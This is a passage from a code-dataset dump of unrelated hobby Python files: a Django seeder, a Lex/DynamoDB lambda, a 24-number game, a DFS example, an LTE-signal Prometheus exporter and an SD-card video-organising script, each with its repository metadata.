set_to_cases(test_in))\n\ttest_out_line = test_out.split(\"\\n\")[case_number]\n\tif test_solution_line == test_out_line:\n\t\tlogging.info(\"Test line {} passed\".format(case_number))\n\telse:\n\t\tlogging.warning(\"Test line {} failed\".format(case_number))\n\t\tlogging.info(test_solution_line)\n\t\tlogging.info(test_out_line)\n\nlogging.info(list(set_to_cases_blocks_numbered(test_in)))\n\ntest_solution = solve_set(test_in)\n\nif test_solution == test_out:\n\tlogging.info(\"Test passed\")\nelse:\n\tlogging.warning(\"Test failed\")\n\tlogging.info(test_solution)\n\tlogging.info(test_out)\n\nproblem_letter = \"B\"\nattempt = 1\nfor problem_size in (\"small\", \"large\"):\n\tif input(\"Solve {} {}? 
(y)\".format(problem_letter, problem_size)):\n\t\tname = \"{}-{}{}\".format(problem_letter, problem_size, problem_size == \"small\" and \"-attempt{}\".format(attempt) or \"\")\n\t\twith open(name + \".in\") as file_in:\n\t\t\twith open(name + \".out\".format(problem_letter, problem_size), \"w\") as file_out:\n\t\t\t\tprint(solve_set(file_in.read()), file=file_out)\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_117/678.py","file_name":"678.py","file_ext":"py","file_size_in_byte":3481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28133872310","text":"import random\nfrom django.core.management.base import BaseCommand\nfrom django.contrib.admin.utils import flatten\nfrom django_seed import Seed\nfrom users import models as user_models\nfrom advertisements import models as ad_models\n\n\nclass Command(BaseCommand):\n\n help = \"This command helps to create students' advertisement\"\n\n def add_arguments(self, parser):\n parser.add_argument(\n \"--number\", default=2, type=int, help=\"How many ads you want to create\"\n )\n\n def handle(self, *args, **options):\n number = options.get(\"number\")\n seeder = Seed.seeder()\n all_users = user_models.User.objects.all()\n instrument = ad_models.instrumentChoice.objects.all()\n seeder.add_entity(\n ad_models.Advertisement,\n number,\n {\n \"student\": lambda x: random.choice(all_users),\n \"instrument\": lambda x: random.choice(instrument),\n \"min_fee\": lambda x: random.randint(10000, 30000),\n \"max_fee\": lambda x: random.randint(30000, 100000),\n },\n )\n\n created_ads = seeder.execute()\n created_clean = flatten(list(created_ads.values()))\n desired_lesson_days = ad_models.LessonDay.objects.all()\n lesson_type = ad_models.LessonType.objects.all()\n prefer_style = ad_models.PreferStyle.objects.all()\n\n for pk in created_clean:\n advertisement = ad_models.Advertisement.objects.get(pk=pk)\n\n for d in desired_lesson_days:\n magic_number = random.randint(0, 10)\n if magic_number % 2 == 0:\n advertisement.desired_lesson_days.add(d)\n\n for t in lesson_type:\n magic_number = random.randint(0, 10)\n if magic_number % 2 == 0:\n advertisement.lesson_type.add(t)\n\n for p in prefer_style:\n magic_number = random.randint(0, 10)\n if magic_number % 2 == 0:\n advertisement.prefer_style.add(p)\n\n self.stdout.write(self.style.SUCCESS(f\"{number} students' ads created!\"))\n","repo_name":"bolmun/music_application","sub_path":"advertisements/management/commands/seed_ads.py","file_name":"seed_ads.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27519191173","text":"from __future__ import print_function # Python 2/3 compatibility\r\nimport boto3\r\nimport json\r\nimport decimal\r\nfrom boto3.dynamodb.conditions import Key\r\n\r\n# Define what table to query base on lex intent\r\nreturn_table = {\r\n 'aboutBooth': 'TempBoothInfo2',\r\n 'aboutEvent': 'EventInfo',\r\n 'Software_Engineering_Booth': 'workshopList'\r\n}\r\nreturn_slot = {\r\n 'aboutBooth': 'Booth',\r\n 'aboutEvent': 'eventName',\r\n 'aboutWorkshop': 'workshopName',\r\n 'listWorkshop': 'workshopList'\r\n}\r\n\r\n\r\ndef queryDB(intent_name,item_name):\r\n try:\r\n dynamodb = boto3.resource('dynamodb', region_name='us-east-1')\r\n table = dynamodb.Table(return_table[intent_name])\r\n response = table.query(\r\n IndexName='Info-index',\r\n KeyConditionExpression=Key('Name').eq(item_name)\r\n )\r\n 
item_name = str(response['Items'][0]['Info'])\r\n    except Exception as e:\r\n        item_name += ' is not found. queryDB Debug: ' + str(e)\r\n    return item_name\r\n\r\ndef main(event,context):\r\n    try:\r\n        intent_name = event['currentIntent']['name']\r\n        item_name = event['currentIntent']['slotDetails'][return_slot[intent_name]]['resolutions'][0]['value']\r\n        # look up the answer in DynamoDB; this also guarantees 'output' is defined on the success path\r\n        output = queryDB(intent_name, item_name)\r\n    except Exception as e:\r\n        output = 'Booth not found. Debug: ' + str(e)\r\n    response = {\r\n        \"dialogAction\": {\r\n            \"type\": \"Close\",\r\n            \"fulfillmentState\": \"Fulfilled\",\r\n            \"message\": {\r\n                \"contentType\": \"CustomPayload\",\r\n                \"content\": \"Here is what I found: \" + output\r\n            },\r\n        }\r\n    }\r\n    return response\r\n\r\n\r\n","repo_name":"180133517/fyp-cdk","sub_path":"cdkdeploy/lambda/lexResponseWithDBinPython.py","file_name":"lexResponseWithDBinPython.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"35796896770","text":"try:\n    import os\n    import gym\n    import gym_minigrid\n    from gym_minigrid.wrappers import *\n    from gym_minigrid.envelopes_light import *\n    from gym import wrappers, logger\nexcept Exception as e:\n    print(\" =========== =========== IMPORT ERROR ===========\")\n    print(e)\n    pass\n\nfrom configurations import config_grabber as cg\n\n\ndef make_env(env_id, seed, rank, evaluation_id, force=False, resume=False, custom_message=\"_\"):\n\n    config = cg.Configuration.grab()\n\n    def _thunk():\n        env = gym.make(env_id)\n        env.seed(seed + rank)\n\n        if config.envelope:\n            env = SafetyEnvelope(env)\n\n        # record only the first agent\n        if config.recording and rank==0:\n            print(\"starting recording..\")\n            eval_folder = os.path.abspath(os.path.dirname(__file__) + \"/../\" + config.evaluation_directory_name)\n            if config.envelope:\n                expt_dir = eval_folder + \"/\" + evaluation_id + \"_videos\"\n            else:\n                expt_dir = eval_folder + \"/\" + evaluation_id + \"_videos\"\n\n            uid = \"___proc_n_\" + str(rank) + \" ___\" + custom_message + \"__++__\"\n            env = wrappers.Monitor(env, expt_dir, uid=uid, force=force, resume=resume)\n\n        return env\n\n    return _thunk\n","repo_name":"pierg/wiseml-patterns","sub_path":"pytorch_a2c/envs.py","file_name":"envs.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"39346109666","text":"'''\n\n24-game gives the player 4 numbers, and asks the player to use the operations +, -, * on these numbers\nin a way that the result equals 24\n\n'''\nimport operator\nimport random\nimport itertools\n\nclass number_set():\n\n    def __init__(self, a, b, c, d):\n\n        self.numbers = [a, b, c, d]\n\n    def start_game(self):\n        print('Welcome to the game, 
here are the {0}'.format(self.numbers))\n\n def user_input(self):\n ask_for_input = input(\"please give 3 operations (possible: add for +, sub for -, mul for *) in the order, separate by comma\") # add, sub, mul\n\n while not(len(ask_for_input) == 13):\n ask_for_input = input(\"please check if the operations are correct\")\n\n return ask_for_input\n\n def split(self, user_input):\n x,y,z = user_input.split(',')\n\n return [x.replace(' ', ''),y.replace(' ', ''),z.replace(' ', '')]\n\n def operators(self, operators):\n\n _func = {'add': operator.add, # add\n 'sub': operator.sub, # substract\n 'mul': operator.mul # multiplication\n }\n\n self.f1 = _func[operators[0]]\n self.f2 = _func[operators[1]]\n self.f3 = _func[operators[2]]\n\n def calculate(self):\n self.result1 = self.f1(self.numbers[0], self.numbers[1])\n self.result2 = self.f2(self.result1, self.numbers[2])\n self.result3 = self.f3(self.result2, self.numbers[3])\n return self.result3\n\n def check_answer(self, result3):\n if self.result3 == 24:\n print('Correct')\n\n trial = 0\n while self.result3 != 24:\n print(\"The current answer is {}. Enter 'T' to try again. Enter 'N' to shower answer\".format(self.result3))\n choice = input()\n if choice == 'T' and trial <= 3:\n trial += 1\n user_operations = self.user_input()\n user_operations = self.split(user_operations)\n self.operators(user_operations)\n self.result3 = self.calculate()\n #print(\"The current answer is {}. Enter 'T' to try again. Enter 'N' to shower answer\".format(self.result3))\n if choice == 'T' and trial > 3:\n print('you have reached total number of trials')\n print(answer)\n else:\n print(answer)\n break\n\ndef generate_answers():\n list_all_num = list(itertools.combinations_with_replacement(range(1, 10), 4))\n #print(len(list_all_num))\n\n ops = ['add', 'sub', 'mul']\n list_all_ops = list(itertools.combinations_with_replacement(ops, 3))\n #print(list_all_ops)\n\n possible_cases = []\n all_answers = []\n for i in list_all_num:\n test = number_set(*i)\n for j in list_all_ops:\n user_operations = j\n test.operators(user_operations)\n temp = test.calculate()\n if temp == 24:\n possible_cases.append(i)\n all_answers.append([i, j])\n\n return possible_cases, all_answers\n\nif __name__ == '__main__':\n possible_cases, all_answers = generate_answers()\n\n choice = random.choice(possible_cases)\n answer_index = possible_cases.index(choice)\n answer = all_answers[answer_index] # save the answer\n\n test = number_set(*choice)\n test.start_game()\n\n user_operations = test.user_input()\n user_operations = test.split(user_operations)\n test.operators(user_operations)\n\n result = test.calculate()\n test.check_answer(result)\n\n\n","repo_name":"ailjia/24-Game","sub_path":"pair-programming.py","file_name":"pair-programming.py","file_ext":"py","file_size_in_byte":3489,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"11172478056","text":"import sys\n\ninput = sys.stdin.readline\n\ndef translate_letter_2_index(letter):\n return ord(letter) - ord(\"A\")\n\ndef dfs(depth, x, y):\n global result\n\n if depth > result:\n result = depth\n\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n\n if (0<=nx= n//2+1 and med == None:\n med = num\n\nprint(round(s/n), med, mode, max_n - min_n, sep='\\n')","repo_name":"kim-mg/algorithm","sub_path":"baekjoon/1 
sort/statistics_2108.py","file_name":"statistics_2108.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33296724813","text":"from http.server import HTTPServer, BaseHTTPRequestHandler\nimport os\n\nfrom huawei_lte_api.AuthorizedConnection import AuthorizedConnection\nfrom huawei_lte_api.Client import Client\n\n\nclass SimpleHTTPRequestHandler(BaseHTTPRequestHandler):\n    def do_GET(self):\n        self.send_response(200)\n        self.end_headers()\n        self.wfile.write(prometheusExporter().encode())\n\n\ndef prometheusExporter():\n    # Auth to router\n    connection = AuthorizedConnection('http://' + os.environ['ROUTER_USER'] + ':' + os.environ['ROUTER_PASS'] + '@' + os.environ['ROUTER_ADDRESS'] + '/')\n    # Init Client\n    client = Client(connection)\n\n    # Common attributes\n    device = 'deviceName=\"' + client.device.information().get('DeviceName') + \\\n        '\",iccid=\"' + client.device.information().get('Iccid') + '\"'\n    band = client.device.signal().get('band')\n    deviceband = device\n    if band is not None:\n        deviceband = device + ',band=\"' + band + '\"'\n\n    # Get signal attributes\n    signal = {\n        'band': {'help': 'The signal band the LTE connection is using', 'type': 'gauge', 'device': device, 'value': band},\n        'rsrp': {'help': 'The average power received from a single Reference signal in dBm', 'type': 'gauge', 'device': deviceband, 'value': client.device.signal().get('rsrp')},\n        'rsrq': {'help': 'Indicates quality of the received signal in db', 'type': 'gauge', 'device': deviceband, 'value': client.device.signal().get('rsrq')},\n        'rssi': {'help': 'Represents the entire received power including the wanted power from the serving cell as well as all co-channel power and other sources of noise in dBm', 'type': 'gauge', 'device': deviceband, 'value': client.device.signal().get('rssi')},\n        'rscp': {'help': 'Denotes the power measured by a receiver on a particular physical communication channel in dBm', 'type': 'gauge', 'device': deviceband, 'value': client.device.signal().get('rscp')},\n        'sinr': {'help': 'The signal-to-noise ratio of the given signal in dB', 'type': 'gauge', 'device': deviceband, 'value': client.device.signal().get('sinr')},\n        'ecio': {'help': 'The EC/IO is a measure of the quality/cleanliness of the signal from the tower to the modem and indicates the signal-to noise ratio in dB', 'type': 'gauge', 'device': deviceband, 'value': client.device.signal().get('ecio')}\n    }\n\n    # Format for metric\n    for attribute, info in signal.items():\n        if info['value'] is not None:\n            info['value'] = info['value'].replace(\"dBm\", \"\")\n            info['value'] = info['value'].replace(\"dB\", \"\")\n            info['value'] = info['value'].replace(\">=\", \"\")\n\n    # Format data for prometheus\n    response = []\n    for attribute, info in signal.items():\n        if attribute is not None and info['value'] is not None:\n            response.append('#HELP ' + attribute + ' ' + info['help'])\n            response.append('#TYPE ' + attribute + ' ' + info['type'])\n            response.append(\n                attribute + '{' + info['device'] + '} ' + info['value'])\n\n    return '\\n'.join(response)\n\n\n# HTTPServer expects the port as an int; environment variables are strings\nhttpd = HTTPServer(('', int(os.environ['HTTP_PORT'])), SimpleHTTPRequestHandler)\nhttpd.serve_forever()\n","repo_name":"Lomany/lte-signal-exporter","sub_path":"lte-signal-exporter.py","file_name":"lte-signal-exporter.py","file_ext":"py","file_size_in_byte":3171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23134136152","text":"fhand = 
open(\"headpp.ply\")\nfout = open(\"headp_no_normal.ply\", \"w\")\nheader_ended = False\nfor line in fhand:\n if not header_ended:\n fout.write(line)\n else:\n fout.write(\" \".join(line.split()[:3]))\n fout.write(\"\\n\")\n if \"end_header\" in line:\n header_ended = True\nfout.close()\n","repo_name":"JingkangZhang/PersonalWebsite","sub_path":"ply_remove_normal.py","file_name":"ply_remove_normal.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43858759645","text":"# Middle Node\n# Bruce Englert, Meghana Gupta, Ray Grant\nimport random\nimport time\n\nimport Functions\nimport Modified_SSL_Handshake\nimport MySQLdb\n\n\n# DIP - Delayed Intermediate Protocol\n\nprivate_key = Functions.generate_private_key()\nONLINE_PORT = 5432\nOFFLINE_PORT = 5433\nonline_shared_key = b''\noffline_shared_key = b''\n\nonline_n = random.randint(100, 200)\noffline_n = random.randint(100, 200)\n\nnext_time = 0\n\n\ndef perform_online_handshake(online_node_socket):\n global online_shared_key\n [successful_handshake, computed_shared_key] = Modified_SSL_Handshake.server_ssl_handshake(online_node_socket,\n \"Middle Node\",\n private_key)\n online_shared_key = computed_shared_key\n return successful_handshake\n\n\ndef perform_offline_handshake(online_node_socket):\n global offline_shared_key\n [successful_handshake, shared_k] = Modified_SSL_Handshake.client_ssl_handshake(online_node_socket, \"Middle Node\",\n private_key)\n offline_shared_key = shared_k\n return successful_handshake\n\n\ndef send_n(node_socket):\n global online_n\n online_n = random.randint(100, 200)\n print(\"[Middle Node] Sending authorization n.\", online_n)\n [iv, encrypted_n] = Functions.aes_encrypt(online_shared_key, bytes([online_n]))\n n_msg = {\"n\": {\"iv\": iv, \"encrypted_n\": encrypted_n}}\n node_socket.sendall(Functions.wrap_to_send(n_msg))\n\n\ndef send_next_time(node_socket):\n global next_time\n next_time = random.randint(5, 20)\n [iv, encrypted_time] = Functions.aes_encrypt(online_shared_key, bytes([next_time]))\n next_t_msg = {\"next_time\": {\"iv\": iv, \"encrypted_time\": encrypted_time}}\n print(\"[Middle Node] Sending next time\", next_time)\n node_socket.sendall(Functions.wrap_to_send(next_t_msg))\n\n\ndef receive_verify_online_n(node_socket):\n global online_n\n\n n_msg = Functions.read_message_with_delimiter(node_socket)\n decrypted_n_bytes = Functions.aes_decrypt(n_msg[\"n\"][\"iv\"], online_shared_key, n_msg[\"n\"][\"encrypted_n\"])\n decrypted_n = int.from_bytes(decrypted_n_bytes, byteorder='big')\n\n if decrypted_n == online_n-1:\n print(\"[Middle Node] n was received and verified\")\n else:\n print(\"[Middle Node] given n failed authorization test\", online_n)\n print(\"should be: \", decrypted_n)\n node_socket.close()\n\n\ndef sanitize_data(data_string):\n return MySQLdb.escape_string(data_string).decode()\n\n\ndef handle_DH_1_online_connection():\n global online_shared_key\n\n online_socket = Modified_SSL_Handshake.handle_node_connection(5432)\n perform_online_handshake(online_socket) # TODO check if returns true\n\n given_dh_value = Functions.read_message_with_delimiter(online_socket)\n\n # send encrypted n\n send_n(online_socket)\n send_next_time(online_socket)\n online_socket.close()\n return given_dh_value\n\n\ndef initiate_DH_offline_connection(node_1_public_dh):\n #TODO: perform ssl and get shared key\n offline_socket = Modified_SSL_Handshake.connect_to_node(5433)\n\n # send online DH\n 
offline_socket.sendall(Functions.wrap_to_send(node_1_public_dh))\n\n node_3_dh = Functions.read_message_with_delimiter(offline_socket)\n offline_socket.close()\n return node_3_dh\n\n\ndef handle_DH_2_online_connection(node_2_public_dh):\n print(\"opening online connection...\")\n online_socket = Modified_SSL_Handshake.handle_node_connection(5432)\n\n # receive n-1\n receive_verify_online_n(online_socket)\n\n # send offline DH\n online_socket.sendall(Functions.wrap_to_send(node_2_public_dh))\n print(\"[Middle Node] sent DH\")\n\n send_n(online_socket)\n time.sleep(2)\n send_next_time(online_socket)\n\n online_socket.close()\n\n\ndef transfer_data(data):\n offline_socket = Modified_SSL_Handshake.connect_to_node(5433)\n print(\"connected to offline node\")\n offline_socket.send(Functions.wrap_to_send(data))\n print(\"sent\")\n offline_socket.close()\n\n\ndef receive_transfer_data():\n online_socket = Modified_SSL_Handshake.handle_node_connection(5432)\n\n receive_verify_online_n(online_socket)\n data_to_transfer = Functions.read_message_with_delimiter(online_socket)\n\n send_n(online_socket)\n time.sleep(2)\n send_next_time(online_socket)\n print(\"[Middle Node] Received data\")\n online_socket.close()\n return data_to_transfer\n\n\ndef main():\n online_dh_value = handle_DH_1_online_connection()\n print(\"[Middle Node] Received online dh part\")\n offline_dh_value = initiate_DH_offline_connection(online_dh_value)\n print(\"[Middle Node] Received offline dh part\")\n time.sleep(next_time-2)\n handle_DH_2_online_connection(offline_dh_value)\n print(\"[Middle Node] Transferring data...\")\n\n # runs 10 times to simulate real world use\n for i in range(1, 10):\n print(\"sleeping...\", next_time)\n time.sleep(next_time - 2)\n print(\"sending data to transfer\")\n data_to_transfer = receive_transfer_data()\n print(\"transfering data...\")\n transfer_data(data_to_transfer)\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"ray836/Final-Project-CS5490","sub_path":"Middle_Node.py","file_name":"Middle_Node.py","file_ext":"py","file_size_in_byte":5246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32571828928","text":"\n\n# write to a file\nwith open('fruit.txt', 'w') as f:\n f.write('apple\\nbanana\\ncherry\\n')\n# this will overwrite the file\n\n# append to a file without overwriting\nwith open('fruit.txt', 'a') as f:\n f.write('\\npear\\n')\n\n# read and write to a file\nwith open('fruit.txt', 'a+') as myfile:\n myfile.write('\\norange')\n myfile.seek(0)\n content = myfile.read()\n\nprint(content)\n\n\nwith open(\"vegetables.txt\", \"a\") as f:\n f.write(\"broccoli\\n\")\n# this will look for existing file, and create it if not exists\n","repo_name":"mayfiete/python_mega_course","sub_path":"writing_text_to_file.py","file_name":"writing_text_to_file.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23409323156","text":"import unittest\nfrom datetime import datetime\n\nfrom zope.component import queryMultiAdapter\nfrom zope.interface.verify import verifyObject\nfrom Products.Silva.testing import TestRequest, Transaction\n\nfrom silva.app.news.interfaces import INewsItem, IAgendaItem\nfrom silva.app.news.datetimeutils import local_timezone\nfrom silva.app.news.tests.SilvaNewsTestCase import SilvaNewsTestCase\nfrom silva.core.interfaces import IFeedEntry\n\nfrom dateutil.relativedelta import relativedelta\n\n\nclass 
TestFeeds(SilvaNewsTestCase):\n \"\"\" Test atom and rss feeds\n \"\"\"\n\n def setUp(self):\n with Transaction():\n super(TestFeeds, self).setUp()\n # Publication\n factory = self.root.manage_addProduct['silva.app.news']\n factory.manage_addNewsPublication('source', 'Publication')\n factory.manage_addNewsFilter('filter', 'Filter')\n factory.manage_addNewsViewer('viewer', 'Viewer')\n\n self.root.filter.set_show_agenda_items(True)\n self.root.filter.add_source(self.root.source)\n self.root.viewer.add_filter(self.root.filter)\n self.root.viewer.set_hide_expired_events(False)\n\n # Items\n self.add_published_news_item(\n self.root.source, 'raining', 'The rain is coming')\n self.add_published_news_item(\n self.root.source, 'cows', 'Cows are moving in town')\n start_event = datetime(2010, 10, 9, 8, 20, 00, tzinfo=local_timezone)\n end_event = start_event + relativedelta(hours=+2)\n self.add_published_agenda_item(\n self.root.source, 'war', 'This is War', start_event, end_event)\n\n def test_feeds_agenda_item(self):\n entry = queryMultiAdapter(\n (self.root.source.war, TestRequest()),\n IFeedEntry)\n self.assertTrue(verifyObject(IAgendaItem, self.root.source.war))\n self.assertTrue(verifyObject(IFeedEntry, entry))\n self.assertEqual(entry.id(), 'http://localhost/root/source/war')\n self.assertEqual(entry.title(), 'This is War')\n self.assertEqual(entry.url(), 'http://localhost/root/source/war')\n self.assertEqual(entry.authors(), ['manager'])\n self.assertEqual(entry.description(), '')\n self.assertEqual(entry.keywords(), [])\n self.assertEqual(entry.html_description(), \"

      \")\n self.assertEqual(entry.location(), '')\n self.assertEqual(entry.start_datetime(), '2010-10-09T08:20:00+02:00')\n self.assertEqual(entry.end_datetime(), '2010-10-09T10:20:00+02:00')\n\n def test_feeds_news_item(self):\n entry = queryMultiAdapter(\n (self.root.source.cows, TestRequest()),\n IFeedEntry)\n self.assertTrue(verifyObject(INewsItem, self.root.source.cows))\n self.assertTrue(verifyObject(IFeedEntry, entry))\n self.assertEqual(entry.id(), 'http://localhost/root/source/cows')\n self.assertEqual(entry.title(), 'Cows are moving in town')\n self.assertEqual(entry.url(), 'http://localhost/root/source/cows')\n self.assertEqual(entry.authors(), ['manager'])\n self.assertEqual(entry.description(), '')\n self.assertEqual(entry.keywords(), [])\n self.assertEqual(entry.html_description(), \"

      \")\n\n def test_functional_rss_feed_from_viewer(self):\n \"\"\"Test that you can get a rss feeds from a news viewer.\n \"\"\"\n with self.layer.get_browser() as browser:\n self.assertEqual(\n browser.open('http://localhost/root/viewer/rss.xml'),\n 200)\n self.assertEqual(\n browser.content_type,\n 'text/xml;charset=UTF-8')\n\n items = browser.xml.xpath(\n '//rss:item', namespaces={'rss': \"http://purl.org/rss/1.0/\"})\n # We have two news items, and one agenda item.\n self.assertEquals(3, len(items))\n\n def test_functional_atom_feed_from_viewer(self):\n \"\"\"Test that you can get an atom from a news viewer.\n \"\"\"\n with self.layer.get_browser() as browser:\n self.assertEqual(\n browser.open('http://localhost/root/viewer/atom.xml'),\n 200)\n self.assertEqual(\n browser.content_type,\n 'text/xml;charset=UTF-8')\n\n items = browser.xml.xpath(\n '//atom:entry', namespaces={'atom': \"http://www.w3.org/2005/Atom\"})\n # We have two news items, and one agenda item.\n self.assertEquals(3, len(items))\n\n def test_functional_rss_feed_from_publication(self):\n \"\"\"Test that you can get a rss feeds from a default news publication.\n \"\"\"\n with self.layer.get_browser() as browser:\n # Feeds are disabled by default (container settings)\n self.assertEqual(\n browser.open('http://localhost/root/source/rss.xml'),\n 404)\n # If you enable them when they should work\n self.root.source.set_allow_feeds(True)\n self.assertEqual(\n browser.open('http://localhost/root/source/rss.xml'),\n 200)\n self.assertEqual(\n browser.content_type,\n 'text/xml;charset=UTF-8')\n\n items = browser.xml.xpath(\n '//rss:item', namespaces={'rss': \"http://purl.org/rss/1.0/\"})\n # We only have two items, since the feed is only enabled\n # for news and not agenda items\n self.assertEquals(2, len(items))\n\n def test_functional_atom_feed_from_publication(self):\n \"\"\"Test that you can get an atom from a default news publication.\n \"\"\"\n with self.layer.get_browser() as browser:\n self.assertEqual(\n browser.open('http://localhost/root/source/atom.xml'),\n 404)\n # If you enable them when they should work\n self.root.source.set_allow_feeds(True)\n self.assertEqual(\n browser.open('http://localhost/root/source/atom.xml'),\n 200)\n self.assertEqual(\n browser.content_type,\n 'text/xml;charset=UTF-8')\n\n items = browser.xml.xpath(\n '//atom:entry', namespaces={'atom': \"http://www.w3.org/2005/Atom\"})\n # We only have two items, since the feed is only enabled\n # for news and not agenda items\n self.assertEquals(2, len(items))\n\n\ndef test_suite():\n suite = unittest.TestSuite()\n suite.addTest(unittest.makeSuite(TestFeeds))\n return suite\n","repo_name":"silvacms/silva.app.news","sub_path":"src/silva/app/news/tests/test_feeds.py","file_name":"test_feeds.py","file_ext":"py","file_size_in_byte":6608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33305725557","text":"graph_or_tree = {\r\n\"A\" :[\"B\",\"C\"],\r\n\"B\" :[\"D\",\"E\"],\r\n\"C\" :[\"B\",\"F\"],\r\n\"D\": [],\r\n\"E\" : [\"F\"],\r\n\"F\" :[],\r\n\"G\" :[\"B\",\"A\",\"L\",\"A\",\"J\",\"I\"]\r\n}\r\nprint(graph_or_tree[\"G\"])\r\nvisited_path=[]\r\nparent ={}\r\ndfs_path=[]\r\nfor node in graph_or_tree.keys() :\r\n parent[node] =None\r\ndef DFS(node):\r\n visited_path.append(node)\r\n dfs_path.append(node)\r\n\r\n for i in graph_or_tree[node]:\r\n if i not in visited_path:\r\n parent[i] = node\r\n DFS(i)\r\n \r\nDFS(\"A\")\r\nprint(\"The graph = 
\",graph_or_tree)\r\nprint(\"=============Depth First Search Algorithm===========\")\r\nprint(\"traversal path of depth first search =\\t\",*dfs_path,sep = \" -> \")\r\n\r\n\r\n","repo_name":"thebrokencoder-code/python-dfs","sub_path":"dfs.py","file_name":"dfs.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"45752086553","text":"import os\nimport shutil\nimport datetime\nimport msvcrt\nimport psutil\nimport locale\nimport pyperclip\nfrom tqdm import tqdm\n\nlocale.setlocale(locale.LC_TIME, 'pt_BR.UTF-8')\n\ndef copy_files(source, destination):\n total_files = 0\n total_size = 0\n\n # Percorre todos os arquivos e diretórios de origem\n for item in source:\n if os.path.isfile(item):\n total_files += 1\n total_size += os.path.getsize(item)\n elif os.path.isdir(item):\n for root, _, filenames in os.walk(item):\n for filename in filenames:\n file_path = os.path.join(root, filename)\n total_files += 1\n total_size += os.path.getsize(file_path)\n\n print(f\"Total de arquivos a copiar: {total_files}\")\n print(f\"Tamanho total: {total_size} bytes\")\n print(\"Copiando arquivos:\")\n\n # Copia os arquivos e diretórios de origem para o destino\n with tqdm(total=total_size, unit='B', unit_scale=True, ncols=80) as progress_bar:\n for item in source:\n if os.path.isfile(item):\n shutil.copy(item, destination)\n progress_bar.update(os.path.getsize(item))\n elif os.path.isdir(item):\n for root, _, filenames in os.walk(item):\n for filename in filenames:\n file_path = os.path.join(root, filename)\n shutil.copy(file_path, destination)\n progress_bar.update(os.path.getsize(file_path))\n\n print(\"Copying files: Done\")\n print(\"\")\n\ndef rename_files(folder_path):\n files = os.listdir(folder_path)\n for file in files:\n if file.endswith(\".LRV\"):\n new_name = os.path.splitext(file)[0] + \".MP4\"\n os.rename(os.path.join(folder_path, file), os.path.join(folder_path, new_name))\n\ndef create_folder_structure(date, guide_name, tour_name, base_path):\n year_folder = os.path.join(base_path, date.strftime(\"%Y\"))\n month_number = date.strftime('%m')\n month_name = date.strftime('%B').upper()\n folder_name = f\"{date.day} DE {month_name} {date.year} - {tour_name.upper()} - {guide_name.upper()}\"\n folder_path = os.path.join(year_folder, f\"{month_number}. 
{month_name}\", folder_name)\n os.makedirs(folder_path, exist_ok=True)\n footage_path = os.path.join(folder_path, \"Footage\")\n proxy_path = os.path.join(folder_path, \"Proxy Media\")\n os.makedirs(footage_path, exist_ok=True)\n os.makedirs(proxy_path, exist_ok=True)\n return folder_path, footage_path, proxy_path\n\ndef write_message_file(date, tour_name, folder_path):\n formatted_date = date.strftime(\"%d de %B de %Y\").lstrip(\"0\").upper()\n message = f\"*Litoral Vídeos* 📹🏖☀😎\\n\\nOlá!\\n\\nSegue, o link do YouTube com a filmagem do seu passeio de *{tour_name}* do dia *{formatted_date}*:\\n\\n[LINK DO VÍDEO]\\n\\nAqui também vai um link com as imagens aéreas do Ceará que separamos para vocês:\\n\\nhttps://youtu.be/4C7cDVfsGf4\\n\\nObrigado pela sua visita e aproveite a filmagem!\\n\\nQualquer dúvida estamos à disposição.\"\n file_path = os.path.join(folder_path, \"message.txt\")\n with open(file_path, \"w\", encoding='utf-8') as file:\n file.write(message)\n\ndef format_participants_text(pasted_text):\n \n participants = []\n lines = pasted_text.split(\"[\")\n for line in lines:\n if line.strip():\n name = line.split(\":\")[-1].strip()\n participants.append(name.title())\n return participants\n\ndef write_participants_file(participants, folder_path):\n file_path = os.path.join(folder_path, \"participants.txt\")\n with open(file_path, \"w\") as file:\n for participant in participants:\n file.write(participant + \"\\n\")\n\ndef get_sd_card_path():\n drives = psutil.disk_partitions(all=True)\n for drive in drives:\n if drive.fstype.lower() == 'fat32' or drive.fstype.lower() == 'fat':\n return drive.mountpoint\n raise ValueError(\"Nenhum cartão SD detectado\")\n\ndef get_files_to_copy(sd_card_path):\n files_to_copy = []\n for root, _, filenames in os.walk(sd_card_path):\n for filename in filenames:\n file_path = os.path.join(root, filename)\n files_to_copy.append(file_path)\n return files_to_copy\n\ndef get_user_input():\n print(\"De que dia é a filmagem?\")\n print(\"\")\n\n print(\"1) Hoje\")\n print(\"2) Ontem\")\n print(\"3) Especificar data (Formato: DD/MM/AAAA)\")\n print(\"\")\n\n option = int(input(\"Opção: \"))\n if option == 1:\n date = datetime.date.today()\n elif option == 2:\n date = datetime.date.today() - datetime.timedelta(days=1)\n elif option == 3:\n print(\"\")\n date_str = input(\"Digite a data (DD/MM/AAAA): \")\n date = datetime.datetime.strptime(date_str, \"%d/%m/%Y\").date()\n else:\n raise ValueError(\"Opção inválida\")\n 